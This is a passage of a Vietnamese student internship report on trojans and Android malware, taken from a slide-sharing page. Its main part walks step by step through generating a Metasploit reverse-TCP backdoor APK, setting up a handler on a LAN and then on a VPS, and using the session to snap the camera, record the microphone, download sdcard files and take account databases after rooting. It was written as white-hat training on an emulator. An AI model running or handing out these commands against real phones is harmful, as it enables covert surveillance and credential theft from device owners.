hết sức tinh vi. Tinh vi đến nỗi không ít chủ thuê bao dù rất 'kỹ tính" nhưng vẫn
cứ "sập" bẫy như thường. Phổ biến nhất là hacker nội đội lốt những tổ chức
hay công ty có uy tín để đánh lừa chủ thuê bao bằng chương trình phần mềm
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 33
thư ma Ghostmail. "tin tặc" dễ dàng thảo ra những e-mail mạo danh với nội
dung: "Hiện giờ tình trạng đánh cắp mật khẩu thuê bao đang rất phổ biến,
nhằm để phòng tránh, chúng tôi xin được gửi tới quý khách chương trình phần
mềm Tr-Protect (Vi rút Trojan sau khi đã đổi tên)". Có khi chúng lại "đội lốt"
chuyên gia lập trình chương trình diệt virus số 1 Việt Nam Nguyễn Tử Quảng:
"Ðể phòng chống virus Chernobyl 26- 4, chúng tôi hân hạnh gởi tới quý ngài
chương trình BKAV 383. Mong quý vị dùng thử Mọi ý kiến đóng góp xin gửi về
địa chỉ sau quangnt@it-hut.edu.vn". Khi nhận được những tin kiểu như vậy, có
không ít thuê bao dễ dàng "cắn câu" và cứ "tự nhiên" cho chạy chương trình vi
rút Trojan mà không hề nhận thức được rằng họ đang "tự nguyện" hiến mình
thành nạn nhân của bọn "tin tặc".
Như vậy, khi Trojan được kích hoạt trên máy của bạn và khi bạn truy cập
Internet thì Trojan có thể lấy mật khẩu truy cập mạng, lấy danh sách thư điện
tử và thậm chí cả cấu hình máy tính của bạn để gửi cho một địa chỉ thư điện tử
của tên tin tặc. Nhưng nguy hiểm hơn, Trojan còn gửi cả địa chỉ mạng IP, là địa
chỉ mà nhà cung cấp dịch vụ mạng (ISP) gán cho bạn lúc truy cập; tên tin tặc sẽ
sử dụng địa chỉ IP của bạn để thiết lập kết nối từ máy tính của hắn tới máy tính
của bạn qua mạng Internet. Trojan sẽ lấy thông tin, xóa thông tin...
Các thủ đoạn của Hacker
1. Giả danh nhà cung cấp dịch vụ: Hacker lấy danh nghĩa nhà cung cấp
dịch vụ Internet (ISP) gọi điện thoại hoặc gởi e-mail yêu cầu bạn cung cấp
password hoặc đổi password theo họ gợi ý. Hacker mail cho bạn một Attached
File (tập tin .exe) cho biết là file hỗ trợ sử dụng Internet nhưng thực chất đây là
file ăn cắp password.
2. Lợi dụng sự tin tưởng khi mượn hoặc sửa chữa máy tính của bạn họ sẽ
dễ dàng lấy mật khẩu vì đa số người sử dụng đều thường xuyên Save Password
vào máy.
3. Cài "gián điệp" vào máy tính của bạn: Ðây là phương thức cổ điển
nhưng lại là cách ăn cắp password thông dụng và hiệu quả nhất mà không tốn
công sức, thường là file Horse Trojan được gởi qua e-mail với những lời mời
chào hết sức hấp dẫn, kích thích tò mò. Nếu bạn mở file này thì ngay lập tức
máy bạn đã bị nhiễm virus và từ đó trở đi, password của bạn được thường
xuyên gởi về cho Hacker ngay cả khi bạn thay password mới.
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 34
Ðề phòng, tìm và diệt Trojan?
Ðể đề phòng bị nhiễm Trojan và các loại virus, bạn cần thận trọng khi tải
các tập tin trên mạng.
Ðể tìm và diệt Trojan, bạn cần tiến hành theo các bước sau:
1. Không nên tải và chạy thử những tập tin gắn kèm thư điện tử gửi cho
bạn từ những địa chỉ thư điện tử mà bạn không rõ. Cũng vì lý do này
mà tác giả của chương trình diệt vi rút thông dụng BKAV đã cảnh báo
có nhiều kẻ mạo danh gửi cho bạn chương trình diệt virus mà thực
chất là Trojan.
2. Sử dụng chương trình phát hiện và diệt Trojan, bạn có thể tìm kiếm
trên mạng Internet với từ khóa "Detect and destroy Trojan".
3. Nếu bạn không có sẵn trong tay những chương trình phát hiện và diệt
Trojan thì bạn có thể kiểm tra Registry của Window: HKEY – LOCAL –
MACHINE  Software  Microsoft  Windows  Current Version  Run.
Nếu thấy có đường dẫn tới một chương trình mà bạn biết là không
phải của Window hoặc của các chương trình tiện ích, bạn hãy thoát
Window về chế độ DOS và xóa tập tin theo đường dẫn của Registry, vào
lại Window và xóa dòng đã ghi trong Registry. Bạn cũng có thể kiểm tra
cả tập tin Win.ini, System.ini trong thư mục C:Windows sau mục Run
hoặc Load.
2.1.5 Giới thiệu về Malware:
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 35
Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một
phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc
máy tính mà người sử dụng không hề hay biết.
Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware
hiện nay mới chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người
dùng và nó chưa có cơ chế lây lan. Theo các kết quả trên thì Malware trên
Smartphone hiện nay về cách thức hoạt động giống như một phần mềm gián
điệp (Trojan) hơn là một virus phá hủy.
Cơ chế hoạt động của Malware
Malware này hoạt động qua hai giai đoạn:
- Giai đoạn đầu: Malware được nhúng vào trong một ứng dụng và sẽ chiếm
được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong
lần sử dụng đầu tiên.
- Giai đoạn 2: Malware tự động cài đặt một ứng dụng thứ 2 với một
permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2
được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm
thầm tải thêm các ứng dụng khác. Việc cài đặt ứng dụng hệ thống này nhằm
ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được
phép.
Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để
bắt đầu việc lây nhiễm. Ở giai đoạn thứ hai ứng dụng tự động làm một số việc
như là confirm, check-in. Một điều nữa khiến cho bạn không thể biết chúng
hoạt động lúc nào (hầu hết vào khoảng thời gian từ 11h đêm tới 8h sáng ngày
hôm sau). Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng
nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một
hành vi bất thường trên chiếc smartphone của mình.
Mục đích của Malware
Mục đích của Malware mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại
của người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên
các biến thể về sau đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất
nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn
mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của
người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại
sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 36
hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và
chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi
tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các
malware này.
Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc
điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của
chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên
Android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành
này.
2.1.6 Sinh mã độc trên Kali Linux:
Ta sử dụng Metasploit framework trên Kali Linux để tạo một
payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và
điều khiển. Nếu sử dụng máy ảo Kali Linux bằng VMware, ta nên thiết lập
phần Network như sau:
Bấm vào VM -> Settings... ở thanh lựa chọn của VMware
Hình 2.1.24 Setting network VMware (Step 1)
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 37
Bấm vào Network Adapter và chọn Bridged: connection directly to the
physical network
Hình 2.1.25 Setting network VMware (Step 2)
Bấm vào Edit -> Virtual Network Editor...
Hình 2.1.26 Setting network VMware (Step 3)
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 38
Trên phần Bridge (connect VMs directly to the external network)
chọn adapter của máy thật
Hình 2.1.27 Setting network VMware (Step 4)
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đầu tiên mở terminal và gõ dòng lệnh
msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104
lport=8080 R > /root/Desktop/files.apk
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 39
192.168.0.104 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig
để xem IP của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường
sử dụng
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một
Metasploit reverse tcp backdoor.
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 40
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về
bằng cách gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 41
set lhost 192.168.0.104 – [nhập địa chỉ IP giống với khi tạo payload ở
trên].
set lport 8080 – [nhập port giống với port khi tạo payload ở trên].
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
2.1.7 Đưa mã độc vào thiết bị Android:
Vì không có máy Android thật nên mình test thử với một máy Galaxy
Nexus giả lập bằng phần mềm GennyMotion (đăng ký một tài khoản và
donwload tại https://cloud.genymotion.com/page/launchpad/download/), tải
về files.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút
“ReverseTCP”:
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 42
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ
như sau:
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 43
 Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera
xem ở danh sách camera ở phần trước. Ví dụ như sau:
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 44
File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu
ở /root của máy.
 Ghi âm
Để thực hiện ghi âm, nhập lệnh record_mic và file ghi âm sẽ được lưu về
máy
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 45
2.1.8 Xâm nhập SD card của thiết bị Android từ Kali Linux:
Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư
mục
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 46
Dùng lệnh cd /sdcard/Download để vào thư mục
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 47
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Download App.apk
Và file này sẽ được tải về thư mục /root của máy Kali
2.1.9 Kết luận:
Như vậy, ta đã tìm hiểu về Kali Linux, cách sử dụng Metasploit của Kali
Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy android về máy.
Sau khi thử nghiệm cách tấn công này, ta rút ra kết luận: không nên tải về
và chạy file lạ trên máy android để bảo đảm không cài nhầm backdoor như đã
thấy ở trên, chỉ cần máy bị nhiễm backdoor là ta đã có thể xem như có toàn
quyền kiểm soát máy android đó.
2.2 Làm trên VPS
2.2.1 Giới thiệu về VPS:
Định nghĩa
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một
máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 48
Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server
chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share
Host rất nhiều.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng,
có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy,
VPS hạn chế 100% khả năng bị hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau,
chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ
làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài
khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình
thường.
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã
nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên,
VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình
server,….
Đặc điểm về thông số VPS
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU
riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ
điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các
ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập
Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ
cao…
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài
nguyên mà không cần phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
Giá trị khi sử dụng VPS
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn
gói VPS phù hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác
hàng.
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 49
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
2.2.2 Cài đặt mã độc trên VPS:
Giới thiệu
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để
kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ
ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C,
assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành:
Linux, Windows, Mac OS.
Cài đặt
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và
Community. Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu.
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 50
Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những
phần mềm khác.
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 51
Chọn folder cài đặt:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 52
Chọn server và ngày hết hạn, để mặc định:
Quá trình cài đặt của Metasploit:
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 53
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương
trình:
Sau khi Finish trình duyệt web mở lên và đi tới giao diện
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 54
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để
login vào
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi
chọn Create Account:
Trình duyệt chuyển đến trang nhập key để active chương trình, key này
được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate
License:
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 55
Giao diện chương trình Metasploit Console
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 56
2.2.3 Từ VPS xâm nhập vào thiết bị Android:
Các bước thực hiện
1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào
Android như trên mang LAN với địa chỉ IP là địa chỉ của VPS
Chúng ta vẫn sử dụng lệnh
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132
lport=4444 R > /root/Desktop/files.apk
Ở đây địa chỉ VPS là 14.0.21.132
2. Khởi động Metasploit Console trên VPS
3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở
đây chỉ khác là sử dụng chính IP của VPS
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 57
4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android
đó sẽ bị hack
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 58
5. Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ
Để xem thông tin về máy, nhập lệnh sysinfo
Để xem các tác vụ đang chạy gõ ps
Xem ip gõ ifconfig
Xem danh sách thư mục, file gõ ls
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera
xem ở danh sách camera ở phần trước.
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về
máy
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 59
Lấy file từ sd card
Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư
mục
Dùng lệnh cd /sdcard/Download để vào thư mục
Để tải về máy, ta nhập lệnh
Download App.apk
Để upload gõ lệnh upload
Và file này sẽ được tải về thư mục root của máy Kali
Gõ shell để vào lệnh
kiểm tra xem có root chưa gõ
su
whoami
Nếu báo unknown id is 0 tức là đã root
ls -l danh mục file và các quyền
cd để chuyển hướng thư mục
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
để xem danh sách và down load các file hay thay đổi các file trong ROM
đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
Ctrl + C để quay lại
Sử dụng SQLite để mở file db
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 60
3 KẾT QUẢ ĐẠT ĐƯỢC
Những kiến thức lý thuyết đã được củng cố:
 Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android
 Tìm hiểu về hệ điều hành Kali Linux
 Tìm hiểu về các lỗ hổng bảo mật của Windows và Android
 Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng
Những kỹ năng thực hành đã được học thêm:
 Thực hiện cài đặt Android trên máy ảo
 Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của
Windows và Android
 Thi lấy chứng chỉ System Hacking của trung tâm Athena
 Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt
vào Android
 Biết thêm về một số bài học trong lớp Hacker mũ trắng
Những kinh nghiệm thực tiễn đã tích lũy được:
Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh
nghiệm quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và
cũng cố các kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá
trình thực tập trong môi trường doanh nghiệp đã cho em làm quen dần để
không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp
và ứng xử.
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 61
4 KẾT LUẬN QUÁ TRÌNH THỰC TẬP
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................

Contenu connexe

Tendances

Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên AndroidBáo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên AndroidDlinh Truong
 
GIỚI THIỆU VỀ DIGITAL FORENSICS
GIỚI THIỆU VỀ DIGITAL FORENSICSGIỚI THIỆU VỀ DIGITAL FORENSICS
GIỚI THIỆU VỀ DIGITAL FORENSICSTrần Nguyên
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTMasterCode.vn
 
RADIUS - a report project's course at university
RADIUS - a report project's course at universityRADIUS - a report project's course at university
RADIUS - a report project's course at universityHoàng Tuấn Lê
 
Tổng quan về elearning
Tổng quan về elearningTổng quan về elearning
Tổng quan về elearningPhong Lex
 
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Digit Oktavianto
 
Trojan Horse Virus and Hacking
Trojan Horse Virus and Hacking Trojan Horse Virus and Hacking
Trojan Horse Virus and Hacking IT Department Akre
 
Bao cao thuc tap - Điện toán đám mây
Bao cao thuc tap - Điện toán đám mâyBao cao thuc tap - Điện toán đám mây
Bao cao thuc tap - Điện toán đám mâyVan Pham
 
XÂY DỰNG PHẦN MỀM QUẢN LÝ QUÁN CÀ PHÊ
XÂY DỰNG PHẦN MỀM QUẢN LÝ QUÁN CÀ PHÊ XÂY DỰNG PHẦN MỀM QUẢN LÝ QUÁN CÀ PHÊ
XÂY DỰNG PHẦN MỀM QUẢN LÝ QUÁN CÀ PHÊ nataliej4
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hackingHuynh Khang
 
Tấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select unionTấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select unionNguyễn Danh Thanh
 
Two Factor Authentication
Two Factor AuthenticationTwo Factor Authentication
Two Factor AuthenticationNikhil Shaw
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Thịt Xốt Cà Chua
 
Ethical hacking ppt
Ethical hacking pptEthical hacking ppt
Ethical hacking pptNitesh Dubey
 
Virus worm trojan
Virus worm trojanVirus worm trojan
Virus worm trojan100701982
 

Tendances (20)

Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên AndroidBáo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
 
GIỚI THIỆU VỀ DIGITAL FORENSICS
GIỚI THIỆU VỀ DIGITAL FORENSICSGIỚI THIỆU VỀ DIGITAL FORENSICS
GIỚI THIỆU VỀ DIGITAL FORENSICS
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
 
RADIUS - a report project's course at university
RADIUS - a report project's course at universityRADIUS - a report project's course at university
RADIUS - a report project's course at university
 
Bao cao thuc tap tot nghiep
Bao cao thuc tap tot nghiep Bao cao thuc tap tot nghiep
Bao cao thuc tap tot nghiep
 
Tổng quan về elearning
Tổng quan về elearningTổng quan về elearning
Tổng quan về elearning
 
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
 
Trojan Horse Virus and Hacking
Trojan Horse Virus and Hacking Trojan Horse Virus and Hacking
Trojan Horse Virus and Hacking
 
Bao cao thuc tap - Điện toán đám mây
Bao cao thuc tap - Điện toán đám mâyBao cao thuc tap - Điện toán đám mây
Bao cao thuc tap - Điện toán đám mây
 
XÂY DỰNG PHẦN MỀM QUẢN LÝ QUÁN CÀ PHÊ
XÂY DỰNG PHẦN MỀM QUẢN LÝ QUÁN CÀ PHÊ XÂY DỰNG PHẦN MỀM QUẢN LÝ QUÁN CÀ PHÊ
XÂY DỰNG PHẦN MỀM QUẢN LÝ QUÁN CÀ PHÊ
 
Lập trình game unity3d
Lập trình game unity3dLập trình game unity3d
Lập trình game unity3d
 
Báo cáo thực tập môn học an ninh mạng tìm hiểu về mô hình mạng
Báo cáo thực tập môn học an ninh mạng tìm hiểu về mô hình mạngBáo cáo thực tập môn học an ninh mạng tìm hiểu về mô hình mạng
Báo cáo thực tập môn học an ninh mạng tìm hiểu về mô hình mạng
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hacking
 
firewall
firewallfirewall
firewall
 
Tấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select unionTấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select union
 
Two Factor Authentication
Two Factor AuthenticationTwo Factor Authentication
Two Factor Authentication
 
Chữ ký số là gì ? Khái niệm và cách thức hoạt động
Chữ ký số là gì ? Khái niệm và cách thức hoạt độngChữ ký số là gì ? Khái niệm và cách thức hoạt động
Chữ ký số là gì ? Khái niệm và cách thức hoạt động
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
 
Ethical hacking ppt
Ethical hacking pptEthical hacking ppt
Ethical hacking ppt
 
Virus worm trojan
Virus worm trojanVirus worm trojan
Virus worm trojan
 

Similaire à Báo cáo cuối kỳ ATHENA 31/07/2014

đạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhđạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhLoc Tran
 
Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập AthenaKhánh Trung Lý
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi kyNhoxPO
 
Báo cáo cuối kì
Báo cáo cuối kì Báo cáo cuối kì
Báo cáo cuối kì Hà Tiên Nhi
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_AthenaHuynh Khang
 
Triển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetTriển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetLong Vũ
 
Baocaocuoiky athena
Baocaocuoiky athenaBaocaocuoiky athena
Baocaocuoiky athenaLy ND
 
Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hườngHường Tô
 
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ckice_eyes
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng PhongPhong Hoang
 
Báo cáo cuối kỳ
Báo cáo cuối kỳBáo cáo cuối kỳ
Báo cáo cuối kỳcabietbay
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kìtuankiet123
 
Báo Cáo Cuối Kỳ
Báo Cáo Cuối KỳBáo Cáo Cuối Kỳ
Báo Cáo Cuối KỳLy ND
 
Báo Cáo Cuối Khóa
Báo Cáo Cuối KhóaBáo Cáo Cuối Khóa
Báo Cáo Cuối KhóaLy ND
 
